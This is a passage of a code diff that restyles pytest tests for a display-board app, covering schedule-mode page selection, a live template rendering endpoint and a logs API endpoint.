+            with patch("src.main.get_page_service", return_value=page_service):
+                with patch("src.main.get_settings_service", return_value=settings_service):
+                    with patch("src.main.get_schedule_service", return_value=schedule_service):
+                        with patch("src.schedules.service.get_settings_service", return_value=settings_service):
                             # Mock TimeService to return Monday 12:00 (within schedule)
                             # Create a mock datetime for Monday 12:00
                             mock_datetime_obj = datetime(2025, 1, 13, 12, 0, 0)  # Monday Jan 13, 2025 at 12:00
-                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=timezone.utc)
-                            
+                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=UTC)
+
                             mock_time_service = Mock()
                             mock_time_service.get_current_time.return_value = mock_datetime_obj
-                            
-                            with patch('src.time_service.get_time_service', return_value=mock_time_service):
+
+                            with patch("src.time_service.get_time_service", return_value=mock_time_service):
                                 service = DisplayService()
                                 service.vb_client = mock_client_instance
-                                
+
                                 # Check active page (should use scheduled page2, not manual page1)
-                                result = service.check_and_send_active_page()
-                                
+                                service.check_and_send_active_page()
+
                                 # Verify it used page2 (scheduled), not page1 (manual)
                                 assert service._last_active_page_id == page2.id
-    
+
     def test_schedule_mode_with_no_match_uses_default(self, services):
         """Test that schedule mode uses default page when no schedule matches."""
-        page_service = services['page']
-        schedule_service = services['schedule']
-        settings_service = services['settings']
-        
+        page_service = services["page"]
+        schedule_service = services["schedule"]
+        settings_service = services["settings"]
+
         # Create pages
-        default_page = page_service.create_page(PageCreate(
-            name="Default Page",
-            type="template",
-            template=["Default for gaps", "", "", "", "", ""]
-        ))
-        scheduled_page = page_service.create_page(PageCreate(
-            name="Scheduled Page",
-            type="template",
-            template=["Scheduled content", "", "", "", "", ""]
-        ))
-        
+        default_page = page_service.create_page(
+            PageCreate(name="Default Page", type="template", template=["Default for gaps", "", "", "", "", ""])
+        )
+        scheduled_page = page_service.create_page(
+            PageCreate(name="Scheduled Page", type="template", template=["Scheduled content", "", "", "", "", ""])
+        )
+
         # Set default page in schedules
         schedule_service.set_default_page(default_page.id)
-        
+
         # Create a schedule for Monday 9am-5pm only
-        schedule_service.create_schedule(ScheduleCreate(
-            page_id=scheduled_page.id,
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="custom",
-            custom_days=["monday"],
-            enabled=True
-        ))
-        
+        schedule_service.create_schedule(
+            ScheduleCreate(
+                page_id=scheduled_page.id,
+                start_time="09:00",
+                end_time="17:00",
+                day_pattern="custom",
+                custom_days=["monday"],
+                enabled=True,
+            )
+        )
+
         # Enable schedule mode
         settings_service.set_schedule_enabled(True)
-        
+
         # Create a DisplayService instance with mocked board client
-        with patch('src.main.BoardClient') as mock_board_client:
+        with patch("src.main.BoardClient") as mock_board_client:
             mock_client_instance = Mock()
             mock_client_instance.read_current_message.return_value = None
             mock_client_instance.send_characters.return_value = (True, True)
             mock_board_client.return_value = mock_client_instance
-            
-            with patch('src.main.get_page_service', return_value=page_service):
-                with patch('src.main.get_settings_service', return_value=settings_service):
-                    with patch('src.main.get_schedule_service', return_value=schedule_service):
-                        with patch('src.schedules.service.get_settings_service', return_value=settings_service):
+
+            with patch("src.main.get_page_service", return_value=page_service):
+                with patch("src.main.get_settings_service", return_value=settings_service):
+                    with patch("src.main.get_schedule_service", return_value=schedule_service):
+                        with patch("src.schedules.service.get_settings_service", return_value=settings_service):
                             # Mock TimeService to return Monday 20:00 (outside schedule, should use default)
                             # Create a mock datetime for Monday 20:00
                             mock_datetime_obj = datetime(2025, 1, 13, 20, 0, 0)  # Monday Jan 13, 2025 at 20:00
-                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=timezone.utc)
-                            
+                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=UTC)
+
                             mock_time_service = Mock()
                             mock_time_service.get_current_time.return_value = mock_datetime_obj
-                            
-                            with patch('src.time_service.get_time_service', return_value=mock_time_service):
+
+                            with patch("src.time_service.get_time_service", return_value=mock_time_service):
                                 service = DisplayService()
                                 service.vb_client = mock_client_instance
-                                
+
                                 # Check active page (should use default page)
-                                result = service.check_and_send_active_page()
-                                
+                                service.check_and_send_active_page()
+
                                 # Verify it used the default page
                                 assert service._last_active_page_id == default_page.id
-    
+
     def test_schedule_mode_with_no_match_and_no_default(self, services):
         """Test that schedule mode returns False when no match and no default."""
-        page_service = services['page']
-        schedule_service = services['schedule']
-        settings_service = services['settings']
-        
+        page_service = services["page"]
+        schedule_service = services["schedule"]
+        settings_service = services["settings"]
+
         # Create a scheduled page
-        scheduled_page = page_service.create_page(PageCreate(
-            name="Scheduled Page",
-            type="template",
-            template=["Scheduled content", "", "", "", "", ""]
-        ))
-        
+        scheduled_page = page_service.create_page(
+            PageCreate(name="Scheduled Page", type="template", template=["Scheduled content", "", "", "", "", ""])
+        )
+
         # Create a schedule for Monday 9am-5pm only
-        schedule_service.create_schedule(ScheduleCreate(
-            page_id=scheduled_page.id,
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="custom",
-            custom_days=["monday"],
-            enabled=True
-        ))
-        
+        schedule_service.create_schedule(
+            ScheduleCreate(
+                page_id=scheduled_page.id,
+                start_time="09:00",
+                end_time="17:00",
+                day_pattern="custom",
+                custom_days=["monday"],
+                enabled=True,
+            )
+        )
+
         # DO NOT set a default page
-        
+
         # Enable schedule mode
         settings_service.set_schedule_enabled(True)
-        
+
         # Create a DisplayService instance with mocked board client
-        with patch('src.main.BoardClient') as mock_board_client:
+        with patch("src.main.BoardClient") as mock_board_client:
             mock_client_instance = Mock()
             mock_client_instance.read_current_message.return_value = None
             mock_board_client.return_value = mock_client_instance
-            
-            with patch('src.main.get_page_service', return_value=page_service):
-                with patch('src.main.get_settings_service', return_value=settings_service):
-                    with patch('src.main.get_schedule_service', return_value=schedule_service):
-                        with patch('src.schedules.service.get_settings_service', return_value=settings_service):
+
+            with patch("src.main.get_page_service", return_value=page_service):
+                with patch("src.main.get_settings_service", return_value=settings_service):
+                    with patch("src.main.get_schedule_service", return_value=schedule_service):
+                        with patch("src.schedules.service.get_settings_service", return_value=settings_service):
                             # Mock TimeService to return Tuesday 12:00 (no schedule for Tuesday)
                             # Create a mock datetime for Tuesday 12:00
                             mock_datetime_obj = datetime(2025, 1, 14, 12, 0, 0)  # Tuesday Jan 14, 2025 at 12:00
-                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=timezone.utc)
-                            
+                            mock_datetime_obj = mock_datetime_obj.replace(tzinfo=UTC)
+
                             mock_time_service = Mock()
                             mock_time_service.get_current_time.return_value = mock_datetime_obj
-                            
-                            with patch('src.time_service.get_time_service', return_value=mock_time_service):
+
+                            with patch("src.time_service.get_time_service", return_value=mock_time_service):
                                 service = DisplayService()
                                 service.vb_client = mock_client_instance
-                                
+
                                 # Check active page (should return False - no page available)
                                 result = service.check_and_send_active_page()
-                                
+
                                 # Verify it returned False and didn't send
                                 assert result is False
                                 assert service._last_active_page_id is None
-

--- a/tests/test_live_output.py
+++ b/tests/test_live_output.py
@@ -1,7 +1,8 @@
 """Tests for the live output feature (POST /templates/render/live)."""
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 
@@ -11,6 +12,7 @@ class TestRenderTemplateLiveEndpoint:
     @pytest.fixture
     def client(self):
         from src.api_server import app
+
         return TestClient(app)
 
     def test_missing_template_returns_400(self, client):
@@ -30,9 +32,7 @@ class TestRenderTemplateLiveEndpoint:
 
     def test_all_blank_lines_returns_empty_without_sending(self, client):
         """All-blank template returns empty without sending."""
-        response = client.post("/templates/render/live", json={
-            "template": ["", "", "", "", "", ""]
-        })
+        response = client.post("/templates/render/live", json={"template": ["", "", "", "", "", ""]})
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is False
@@ -40,9 +40,7 @@ class TestRenderTemplateLiveEndpoint:
 
     def test_whitespace_only_template_returns_empty(self, client):
         """Whitespace-only strings are treated as empty."""
-        response = client.post("/templates/render/live", json={
-            "template": ["   ", "  "]
-        })
+        response = client.post("/templates/render/live", json={"template": ["   ", "  "]})
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is False
@@ -55,8 +53,8 @@ class TestRenderTemplateLiveEndpoint:
         assert data["sent_to_board"] is False
         assert data["line_count"] == 6
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_render_with_content_and_no_boards(self, mock_settings, mock_engine, client):
         """Template with content renders but does not send when no boards configured."""
         engine = Mock()
@@ -69,18 +67,16 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_board_settings.return_value = board_settings
         mock_settings.return_value = settings
 
-        response = client.post("/templates/render/live", json={
-            "template": ["Hello World"]
-        })
+        response = client.post("/templates/render/live", json={"template": ["Hello World"]})
         assert response.status_code == 200
         data = response.json()
         assert "Hello World" in data["rendered"]
         assert data["sent_to_board"] is False
         assert data["board_id"] is None
 
-    @patch('src.api_server.board_client_from_board_dict')
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.board_client_from_board_dict")
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_render_and_send_to_default_board(self, mock_settings, mock_engine, mock_client_factory, client):
         """Content is rendered and sent to the first board when no board_id specified."""
         engine = Mock()
@@ -92,9 +88,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_client_factory.return_value = mock_board_client
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Living Room", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Living Room", "device_type": "flagship"}]
         transition_settings = Mock()
         transition_settings.strategy = "column"
         transition_settings.step_interval_ms = 500
@@ -105,9 +99,7 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        response = client.post("/templates/render/live", json={
-            "template": ["Hello Board"]
-        })
+        response = client.post("/templates/render/live", json={"template": ["Hello Board"]})
 
         assert response.status_code == 200
         data = response.json()
@@ -115,8 +107,8 @@ class TestRenderTemplateLiveEndpoint:
         assert data["board_id"] == "board-1"
         assert "Hello Board" in data["rendered"]
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_render_and_send_to_specific_board(self, mock_settings, mock_engine, client):
         """Content is sent to a specific board when board_id is provided."""
         engine = Mock()
@@ -141,19 +133,22 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client):
-            response = client.post("/templates/render/live", json={
-                "template": ["Hello Note"],
-                "board_id": "board-2",
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client):
+            response = client.post(
+                "/templates/render/live",
+                json={
+                    "template": ["Hello Note"],
+                    "board_id": "board-2",
+                },
+            )
 
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is True
         assert data["board_id"] == "board-2"
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_nonexistent_board_id_returns_404(self, mock_settings, mock_engine, client):
         """Requesting a non-existent board_id returns 404."""
         engine = Mock()
@@ -168,15 +163,18 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_board_settings.return_value = board_settings
         mock_settings.return_value = settings
 
-        response = client.post("/templates/render/live", json={
-            "template": ["Hello"],
-            "board_id": "nonexistent-board",
-        })
+        response = client.post(
+            "/templates/render/live",
+            json={
+                "template": ["Hello"],
+                "board_id": "nonexistent-board",
+            },
+        )
         assert response.status_code == 404
         assert "Board not found" in response.json()["detail"]
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_board_client_none_skips_send(self, mock_settings, mock_engine, client):
         """When board_client_from_board_dict returns None, send is skipped."""
         engine = Mock()
@@ -184,24 +182,20 @@ class TestRenderTemplateLiveEndpoint:
         mock_engine.return_value = engine
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Unconfigured", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Unconfigured", "device_type": "flagship"}]
         settings = Mock()
         settings.get_board_settings.return_value = board_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=None):
-            response = client.post("/templates/render/live", json={
-                "template": ["Hello"]
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=None):
+            response = client.post("/templates/render/live", json={"template": ["Hello"]})
 
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is False
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_board_send_failure_returns_sent_false(self, mock_settings, mock_engine, client):
         """When the board client raises an exception, sent_to_board is False."""
         engine = Mock()
@@ -212,9 +206,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_board_client.send_characters.side_effect = Exception("Connection refused")
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Flagship", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Flagship", "device_type": "flagship"}]
         transition_settings = Mock()
         transition_settings.strategy = None
         transition_settings.step_interval_ms = None
@@ -225,17 +217,15 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client):
-            response = client.post("/templates/render/live", json={
-                "template": ["Hello"]
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client):
+            response = client.post("/templates/render/live", json={"template": ["Hello"]})
 
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is False
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_board_not_actually_sent_returns_false(self, mock_settings, mock_engine, client):
         """When send_characters returns (True, False), sent_to_board is False (skipped unchanged)."""
         engine = Mock()
@@ -246,9 +236,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_board_client.send_characters.return_value = (True, False)
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Flagship", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Flagship", "device_type": "flagship"}]
         transition_settings = Mock()
         transition_settings.strategy = None
         transition_settings.step_interval_ms = None
@@ -259,17 +247,15 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client):
-            response = client.post("/templates/render/live", json={
-                "template": ["Hello"]
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client):
+            response = client.post("/templates/render/live", json={"template": ["Hello"]})
 
         assert response.status_code == 200
         data = response.json()
         assert data["sent_to_board"] is False
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_string_template_rendered(self, mock_settings, mock_engine, client):
         """String templates (not lists) are rendered correctly."""
         engine = Mock()
@@ -282,29 +268,25 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_board_settings.return_value = board_settings
         mock_settings.return_value = settings
 
-        response = client.post("/templates/render/live", json={
-            "template": "{{weather.temperature}} degrees"
-        })
+        response = client.post("/templates/render/live", json={"template": "{{weather.temperature}} degrees"})
         assert response.status_code == 200
         data = response.json()
         assert data["rendered"] == "72 degrees"
         assert data["sent_to_board"] is False
 
-    @patch('src.api_server.get_template_engine')
+    @patch("src.api_server.get_template_engine")
     def test_template_render_error_returns_400(self, mock_engine, client):
         """Template rendering errors return 400."""
         engine = Mock()
         engine.render_lines.side_effect = Exception("Render failed")
         mock_engine.return_value = engine
 
-        response = client.post("/templates/render/live", json={
-            "template": ["{{bad_template}}"]
-        })
+        response = client.post("/templates/render/live", json={"template": ["{{bad_template}}"]})
         assert response.status_code == 400
         assert "Template rendering failed" in response.json()["detail"]
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_force_flag_passed_to_board_client(self, mock_settings, mock_engine, client):
         """The force=True flag is passed to send_characters to bypass skip-unchanged."""
         engine = Mock()
@@ -315,9 +297,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_board_client.send_characters.return_value = (True, True)
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Flagship", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Flagship", "device_type": "flagship"}]
         transition_settings = Mock()
         transition_settings.strategy = "column"
         transition_settings.step_interval_ms = 100
@@ -328,16 +308,14 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client):
-            client.post("/templates/render/live", json={
-                "template": ["Hello"]
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client):
+            client.post("/templates/render/live", json={"template": ["Hello"]})
 
         call_kwargs = mock_board_client.send_characters.call_args
         assert call_kwargs[1].get("force") is True or (len(call_kwargs[0]) > 4 and call_kwargs[0][4] is True)
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_note_device_type_uses_correct_dimensions(self, mock_settings, mock_engine, client):
         """When targeting a Note board, the correct 3x15 dimensions are used."""
         engine = Mock()
@@ -348,9 +326,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_board_client.send_characters.return_value = (True, True)
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "note-1", "name": "Note", "device_type": "note"}
-        ]
+        board_settings.boards = [{"id": "note-1", "name": "Note", "device_type": "note"}]
         transition_settings = Mock()
         transition_settings.strategy = None
         transition_settings.step_interval_ms = None
@@ -361,15 +337,20 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client) as mock_factory, \
-             patch('src.api_server.text_to_board_array') as mock_t2b:
+        with (
+            patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client),
+            patch("src.api_server.text_to_board_array") as mock_t2b,
+        ):
             mock_t2b.return_value = [[0] * 15] * 3
             mock_board_client.send_characters.return_value = (True, True)
 
-            response = client.post("/templates/render/live", json={
-                "template": ["Hello"],
-                "board_id": "note-1",
-            })
+            response = client.post(
+                "/templates/render/live",
+                json={
+                    "template": ["Hello"],
+                    "board_id": "note-1",
+                },
+            )
 
         assert response.status_code == 200
         mock_t2b.assert_called_once()
@@ -377,8 +358,8 @@ class TestRenderTemplateLiveEndpoint:
         assert call_kwargs[1]["rows"] == 3
         assert call_kwargs[1]["cols"] == 15
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_response_includes_all_fields(self, mock_settings, mock_engine, client):
         """Response includes all expected fields."""
         engine = Mock()
@@ -391,9 +372,7 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_board_settings.return_value = board_settings
         mock_settings.return_value = settings
 
-        response = client.post("/templates/render/live", json={
-            "template": ["Line 1", "Line 2", "Line 3"]
-        })
+        response = client.post("/templates/render/live", json={"template": ["Line 1", "Line 2", "Line 3"]})
 
         assert response.status_code == 200
         data = response.json()
@@ -406,21 +385,24 @@ class TestRenderTemplateLiveEndpoint:
         assert isinstance(data["line_count"], int)
         assert isinstance(data["sent_to_board"], bool)
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_board_id_passed_in_empty_response(self, mock_settings, mock_engine, client):
         """board_id from request is included in empty template responses."""
-        response = client.post("/templates/render/live", json={
-            "template": [],
-            "board_id": "my-board",
-        })
+        response = client.post(
+            "/templates/render/live",
+            json={
+                "template": [],
+                "board_id": "my-board",
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert data["board_id"] == "my-board"
         assert data["sent_to_board"] is False
 
-    @patch('src.api_server.get_template_engine')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_template_engine")
+    @patch("src.api_server.get_settings_service")
     def test_transition_settings_passed_to_board(self, mock_settings, mock_engine, client):
         """System transition settings are passed to send_characters."""
         engine = Mock()
@@ -431,9 +413,7 @@ class TestRenderTemplateLiveEndpoint:
         mock_board_client.send_characters.return_value = (True, True)
 
         board_settings = Mock()
-        board_settings.boards = [
-            {"id": "board-1", "name": "Flagship", "device_type": "flagship"}
-        ]
+        board_settings.boards = [{"id": "board-1", "name": "Flagship", "device_type": "flagship"}]
         transition_settings = Mock()
         transition_settings.strategy = "diagonal"
         transition_settings.step_interval_ms = 200
@@ -444,10 +424,8 @@ class TestRenderTemplateLiveEndpoint:
         settings.get_transition_settings.return_value = transition_settings
         mock_settings.return_value = settings
 
-        with patch('src.api_server.board_client_from_board_dict', return_value=mock_board_client):
-            client.post("/templates/render/live", json={
-                "template": ["Test"]
-            })
+        with patch("src.api_server.board_client_from_board_dict", return_value=mock_board_client):
+            client.post("/templates/render/live", json={"template": ["Test"]})
 
         mock_board_client.send_characters.assert_called_once()
         call_kwargs = mock_board_client.send_characters.call_args[1]

--- a/tests/test_logs.py
+++ b/tests/test_logs.py
@@ -1,9 +1,10 @@
 """Tests for the logs API endpoint."""
 
-import pytest
 import json
 import os
 from unittest.mock import patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 
@@ -23,32 +24,27 @@ def sample_log_entries():
             "timestamp": "2025-12-25T10:00:00",
             "level": "INFO",
             "logger": "src.api_server",
-            "message": "Server started successfully"
+            "message": "Server started successfully",
         },
         {
             "timestamp": "2025-12-25T10:00:01",
             "level": "DEBUG",
             "logger": "src.board_client",
-            "message": "Connecting to board"
+            "message": "Connecting to board",
         },
         {
             "timestamp": "2025-12-25T10:00:02",
             "level": "WARNING",
             "logger": "src.utils.weather",
-            "message": "Weather API rate limit approaching"
+            "message": "Weather API rate limit approaching",
         },
         {
             "timestamp": "2025-12-25T10:00:03",
             "level": "ERROR",
             "logger": "src.displays.service",
-            "message": "Failed to render display"
+            "message": "Failed to render display",
         },
-        {
-            "timestamp": "2025-12-25T10:00:04",
-            "level": "INFO",
-            "logger": "src.main",
-            "message": "Refresh complete"
-        },
+        {"timestamp": "2025-12-25T10:00:04", "level": "INFO", "logger": "src.main", "message": "Refresh complete"},
     ]
 
 
@@ -56,9 +52,9 @@ def sample_log_entries():
 def log_file_with_entries(test_log_dir, sample_log_entries):
     """Create a log file with sample entries."""
     log_file = test_log_dir / "app.log"
-    with open(log_file, 'w') as f:
+    with open(log_file, "w") as f:
         for entry in sample_log_entries:
-            f.write(json.dumps(entry) + '\n')
+            f.write(json.dumps(entry) + "\n")
     return log_file
 
 
@@ -67,26 +63,28 @@ def mock_api_server(test_log_dir, sample_log_entries):
     """Create a test client with mocked log directory."""
     # Patch the log directory before importing
     with patch.dict(os.environ, {"PRODUCTION": "true"}):
-        with patch('src.api_server.LOG_DIR', test_log_dir):
-            with patch('src.api_server.LOG_FILE', test_log_dir / "app.log"):
+        with patch("src.api_server.LOG_DIR", test_log_dir):
+            with patch("src.api_server.LOG_FILE", test_log_dir / "app.log"):
                 # Create log file
                 log_file = test_log_dir / "app.log"
-                with open(log_file, 'w') as f:
+                with open(log_file, "w") as f:
                     for entry in sample_log_entries:
-                        f.write(json.dumps(entry) + '\n')
-                
+                        f.write(json.dumps(entry) + "\n")
+
                 # Also populate the in-memory buffer
                 from src import api_server
+
                 with api_server._log_lock:
                     api_server._log_buffer.clear()
                     for entry in sample_log_entries:
                         api_server._log_buffer.append(entry)
-                
+
                 # Create test client
                 from src.api_server import app
+
                 client = TestClient(app)
                 yield client
-                
+
                 # Cleanup
                 with api_server._log_lock:
                     api_server._log_buffer.clear()
@@ -99,7 +97,7 @@ class TestLogsEndpoint:
         """Test getting logs with default parameters."""
         response = mock_api_server.get("/logs")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert "logs" in data
         assert "total" in data
@@ -107,7 +105,7 @@ class TestLogsEndpoint:
         assert "offset" in data
         assert "has_more" in data
         assert "filters" in data
-        
+
         # Check default values
         assert data["limit"] == 50
         assert data["offset"] == 0
@@ -117,7 +115,7 @@ class TestLogsEndpoint:
         """Test getting logs with custom limit."""
         response = mock_api_server.get("/logs?limit=2")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert len(data["logs"]) <= 2
         assert data["limit"] == 2
@@ -126,7 +124,7 @@ class TestLogsEndpoint:
         """Test getting logs with offset for pagination."""
         response = mock_api_server.get("/logs?limit=2&offset=2")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["offset"] == 2
         assert data["limit"] == 2
@@ -135,7 +133,7 @@ class TestLogsEndpoint:
         """Test filtering logs by INFO level."""
         response = mock_api_server.get("/logs?level=INFO")
         assert response.status_code == 200
-        
+
         data = response.json()
         for log in data["logs"]:
             assert log["level"] == "INFO"
@@ -145,7 +143,7 @@ class TestLogsEndpoint:
         """Test filtering logs by ERROR level."""
         response = mock_api_server.get("/logs?level=ERROR")
         assert response.status_code == 200
-        
+
         data = response.json()
         for log in data["logs"]:
             assert log["level"] == "ERROR"
@@ -154,7 +152,7 @@ class TestLogsEndpoint:
         """Test that level filter is case-insensitive."""
         response = mock_api_server.get("/logs?level=info")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["filters"]["level"] == "INFO"
 
@@ -168,7 +166,7 @@ class TestLogsEndpoint:
         """Test searching in log messages."""
         response = mock_api_server.get("/logs?search=weather")
         assert response.status_code == 200
-        
+
         data = response.json()
         # Should find the weather-related log
         assert len(data["logs"]) >= 0
@@ -178,7 +176,7 @@ class TestLogsEndpoint:
         """Test that search is case-insensitive."""
         response = mock_api_server.get("/logs?search=SERVER")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["filters"]["search"] == "SERVER"
 
@@ -186,7 +184,7 @@ class TestLogsEndpoint:
         """Test combining level filter and search."""
         response = mock_api_server.get("/logs?level=INFO&search=server")
         assert response.status_code == 200
-        
+
         data = response.json()
         for log in data["logs"]:
             assert log["level"] == "INFO"
@@ -198,31 +196,31 @@ class TestLogsEndpoint:
         # Get first page with small limit
         response = mock_api_server.get("/logs?limit=2&offset=0")
         assert response.status_code == 200
-        
+
         data = response.json()
         if data["total"] > 2:
-            assert data["has_more"] == True
+            assert data["has_more"] is True
 
     def test_get_logs_pagination_no_more(self, mock_api_server, sample_log_entries):
         """Test that has_more is False when no more logs."""
         # Get all logs
         response = mock_api_server.get("/logs?limit=500&offset=0")
         assert response.status_code == 200
-        
+
         data = response.json()
-        assert data["has_more"] == False
+        assert data["has_more"] is False
 
     def test_get_logs_limit_max_value(self, mock_api_server):
         """Test that limit above maximum returns validation error."""
         response = mock_api_server.get("/logs?limit=1000")
         # API rejects values above 500 with a validation error
         assert response.status_code == 422
-    
+
     def test_get_logs_limit_at_max(self, mock_api_server):
         """Test that limit at maximum is accepted."""
         response = mock_api_server.get("/logs?limit=500")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["limit"] == 500
 
@@ -236,7 +234,7 @@ class TestLogsEndpoint:
         """Test that empty search doesn't filter."""
         response = mock_api_server.get("/logs?search=")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["filters"]["search"] is None or data["filters"]["search"] == ""
 
@@ -244,7 +242,7 @@ class TestLogsEndpoint:
         """Test that log entries have correct structure."""
         response = mock_api_server.get("/logs?limit=1")
         assert response.status_code == 200
-        
+
         data = response.json()
         if data["logs"]:
             log = data["logs"][0]
@@ -262,7 +260,7 @@ class TestLogLevels:
         """Test all valid log levels are accepted."""
         response = mock_api_server.get(f"/logs?level={level}")
         assert response.status_code == 200
-        
+
         data = response.json()
         assert data["filters"]["level"] == level
 
@@ -277,12 +275,12 @@ class TestLogFilePersistence:
 
     def test_read_from_log_file(self, log_file_with_entries, sample_log_entries):
         """Test reading logs from file."""
-        with open(log_file_with_entries, 'r') as f:
+        with open(log_file_with_entries) as f:
             lines = f.readlines()
-        
+
         assert len(lines) == len(sample_log_entries)
-        
-        for line, expected in zip(lines, sample_log_entries):
+
+        for line, expected in zip(lines, sample_log_entries, strict=False):
             entry = json.loads(line)
             assert entry["timestamp"] == expected["timestamp"]
             assert entry["level"] == expected["level"]
@@ -290,12 +288,8 @@ class TestLogFilePersistence:
 
     def test_json_line_format(self, log_file_with_entries):
         """Test that logs are stored as JSON lines."""
-        with open(log_file_with_entries, 'r') as f:
+        with open(log_file_with_entries) as f:
             for line in f:
                 # Each line should be valid JSON
                 entry = json.loads(line.strip())
                 assert isinstance(entry, dict)
-
-
-
-

--- a/tests/test_mcp_server.py
+++ b/tests/test_mcp_server.py
@@ -28,11 +28,12 @@ import pytest
 
 pytest.importorskip("mcp", reason="mcp package not installed")
 
-from src.mcp_server import _MCP_AVAILABLE, _build_mcp_server, mcp_server  # noqa: E402
+from src.mcp_server import _MCP_AVAILABLE, _build_mcp_server, mcp_server
 
